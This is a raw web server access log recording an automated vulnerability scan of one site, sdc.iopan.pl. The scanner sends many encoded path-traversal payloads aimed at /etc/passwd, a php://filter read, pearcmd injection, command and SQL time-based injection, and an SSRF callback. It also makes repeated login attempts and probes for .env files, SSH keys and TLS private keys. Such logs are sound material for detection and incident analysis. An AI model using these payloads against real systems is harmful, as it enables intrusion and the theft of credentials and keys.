195.164.49.69 - - [20/Oct/2024:19:02:22 +0000] GET /?q=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&s=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&search=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&id=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&action=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keyword=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&query=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keywords=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&view=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&cat=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&name=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&key=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&p=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:24 +0000] GET /?q=....//....//etc/passwd&s=....//....//etc/passwd&search=....//....//etc/passwd&id=....//....//etc/passwd&action=....//....//etc/passwd&keyword=....//....//etc/passwd&query=....//....//etc/passwd&page=....//....//etc/passwd&keywords=....//....//etc/passwd&url=....//....//etc/passwd&view=....//....//etc/passwd&cat=....//....//etc/passwd&name=....//....//etc/passwd&key=....//....//etc/passwd&p=....//....//etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:26 +0000] GET /?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:19:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:02:28 +0000] GET /?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:30 +0000] GET /?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:31 +0000] GET /?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:33 +0000] GET /?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:35 +0000] GET /?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:37 +0000] GET /?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:39 +0000] GET /image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:02:40 +0000] GET /image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:02:42 +0000] GET /file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:02:44 +0000] GET /file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:02:45 +0000] GET /image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:02:47 +0000] GET /image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:02:49 +0000] GET /file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:02:51 +0000] GET /file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:02:52 +0000] GET /?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:56 +0000] GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:02:58 +0000] GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:19:03:00 +0000] GET /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:19:03:02 +0000] GET /SAAS/t/_/;/WEB-INF/web.xml HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:19:03:05 +0000] GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:03:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:03:09 +0000] GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+Wqm3KnRddJ.log HTTP/1.1 200 11204
- - - [20/Oct/2024:19:03:10 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:03:33 +0000] POST /jolokia/read/getDiagnosticOptions HTTP/1.1 404 1115
77.87.163.227 - - [20/Oct/2024:19:04:08 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [20/Oct/2024:19:04:10 +0000] POST /webtools/control/xmlrpc HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:19:04:12 +0000] POST /CDGServer3/ClientAjax HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:19:04:18 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:04:18 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:04:18 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:04:21 +0000] POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:04:22 +0000] POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:04:24 +0000] POST /wp-json/buddypress/v1/signup HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:19:04:34 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:04:55 +0000] GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:05:17 +0000] POST /delete_cart_goods.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:05:41 +0000] POST /hms/admin/ HTTP/1.1 404 1092
83.212.98.101 - - [20/Oct/2024:19:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:06:04 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:06:26 +0000] POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:19:06:28 +0000] GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:19:06:30 +0000] GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:19:06:32 +0000] POST /api/users HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:06:34 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
- - - [20/Oct/2024:19:06:36 +0000] GET null HTTP/1.1 400 2308
83.212.98.101 - - [20/Oct/2024:19:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:07:51 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:07:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:07:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:07:57 +0000] GET /interface-data/books-init HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:19:08:01 +0000] GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:19:08:23 +0000] POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:19:08:24 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:08:26 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:08:27 +0000] POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:08:28 +0000] POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:08:28 +0000] POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:08:28 +0000] POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:08:28 +0000] POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:08:28 +0000] POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:08:29 +0000] POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:08:29 +0000] POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:08:47 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:08:51 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:08:52 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:08:52 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:08:52 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:08:52 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:08:57 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:09:00 +0000] POST /cu.html HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:19:09:02 +0000] POST /json HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:09:04 +0000] POST /api/v1/users/signin HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:19:09:07 +0000] GET /prop.htm HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:09:08 +0000] GET /geoserver/web/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:09:10 +0000] POST /geoserver/j_spring_security_check HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:19:09:12 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:19:09:14 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:09:15 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:09:15 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:09:16 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:19:09:21 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:09:24 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:09:25 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:09:25 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:19:09:31 +0000] POST /core/ajax/user.ajax.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:19:09:32 +0000] GET /index.php?v=d&p=dashboard HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:09:52 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:52 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:52 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:52 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:52 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:53 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:53 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:55 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:55 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:55 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:55 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:09:55 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
77.87.163.227 - - [20/Oct/2024:19:09:56 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [20/Oct/2024:19:09:58 +0000] GET /?controller=AuthController&action=login HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:10:02 +0000] POST /cgi-bin/luci/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:10:06 +0000] GET /nagios/side.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:10:06 +0000] GET /nagios/side.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:10:08 +0000] POST /api/tokens HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:10:10 +0000] POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:10:12 +0000] GET /config/pw_left_bar.html HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:10:14 +0000] POST /j_security_check HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:10:16 +0000] GET /menu/home HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:10:18 +0000] POST /op/op.Login.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:10:20 +0000] GET /admin/default/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:10:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:10:26 +0000] GET /userRpm/MenuRpm.htm HTTP/1.1 404 1097
83.212.98.101 - - [20/Oct/2024:19:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:10:55 +0000] GET /console/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:10:55 +0000] POST /console/j_security_check HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:10:56 +0000] POST /console/j_security_check HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:10:56 +0000] GET /console/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:10:56 +0000] POST /console/j_security_check HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:10:57 +0000] GET /console/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:10:57 +0000] POST /console/j_security_check HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:10:57 +0000] GET /console/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:10:57 +0000] GET /console/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:10:57 +0000] GET /console/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:10:57 +0000] POST /console/j_security_check HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:10:57 +0000] GET /console/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:10:57 +0000] POST /console/j_security_check HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:10:58 +0000] POST /console/j_security_check HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:10:58 +0000] GET /console/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:10:58 +0000] POST /console/j_security_check HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:11:00 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:11:11 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:11:11 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:11:11 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:11:12 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:11:12 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:11:12 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:11:12 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:11:12 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:11:12 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:11:12 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:11:12 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:11:22 +0000] GET /config/jwt/private.pem HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:19:11:22 +0000] GET /localhost.key HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:11:23 +0000] GET /host.key HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:11:30 +0000] GET /www.key HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:19:11:30 +0000] GET /private-key HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:11:31 +0000] GET /privatekey.key HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:11:31 +0000] GET /server.key HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:11:31 +0000] GET /my.key HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:11:31 +0000] GET /key.pem HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:19:11:31 +0000] GET /ssl/localhost.key HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:11:31 +0000] GET /ssl/sdc.iopan.pl:443.key HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:11:31 +0000] GET /id_rsa HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:11:31 +0000] GET /id_dsa HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:11:32 +0000] GET /id_rsa_1024 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:11:32 +0000] GET /id_rsa_2048 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:11:32 +0000] GET /id_rsa_3072 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:11:32 +0000] GET /id_rsa_4096 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:11:32 +0000] GET /.ssh/id_rsa HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:11:32 +0000] GET /.ssh/id_dsa HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:11:32 +0000] GET /.ssh/id_rsa_1024 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:11:33 +0000] GET /.ssh/id_rsa_2048 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:11:33 +0000] GET /.ssh/id_rsa_3072 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:11:33 +0000] GET /.ssh/id_rsa_4096 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:11:33 +0000] GET /sdc.iopan.pl:443.key HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:11:33 +0000] GET /sdc.iopan.pl:443.pem HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:12:11 +0000] GET /jwt/private.pem HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:12:12 +0000] GET /var/jwt/private.pem HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:12:12 +0000] GET /private.pem HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:12:19 +0000] GET /ssl.txt HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:19:12:19 +0000] GET /ssl_key.txt HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:12:19 +0000] GET /certificates/sdc.iopan.pl.pfx HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:12:19 +0000] GET /certificates/sdc.iopan.pl.p12 HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:12:20 +0000] GET /ssl/sdc.iopan.pl.pem HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:19:12:20 +0000] GET /ssl/sdc.iopan.pl_key.txt HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:12:20 +0000] GET /cert/sdc.iopan.pl_key.txt HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:19:12:20 +0000] GET /cert/iopan.pl_key.txt HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:19:12:20 +0000] GET /cert/sdc.iopan.pl.txt HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:19:12:20 +0000] GET /ssl/private/sdc.iopan.pl_key.pem HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:19:12:21 +0000] GET /certs/sdc.iopan.pl.key HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:12:21 +0000] GET /certificates/sdc.iopan.pl_priv.pem HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:19:12:21 +0000] GET /private/sdc.iopan.pl.key HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:12:21 +0000] GET /keys/sdc.iopan.pl.pem HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:19:12:22 +0000] GET /certs/sdc.iopan.pl_private.key HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:19:12:22 +0000] GET /certificates/sdc.iopan.pl_privkey.pem HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:12:22 +0000] GET /certs/sdc.iopan.pl.pem HTTP/1.1 404 1100
83.212.98.101 - - [20/Oct/2024:19:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
- - - [20/Oct/2024:19:12:53 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:12:55 +0000] GET /registerUser.html?init=1 HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:12:56 +0000] POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:19:13:18 +0000] POST /CDGServer3/NoticeAjax;Service HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:14:00 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:04 +0000] GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:04 +0000] GET /etc/passwd HTTP/1.1 404 1088
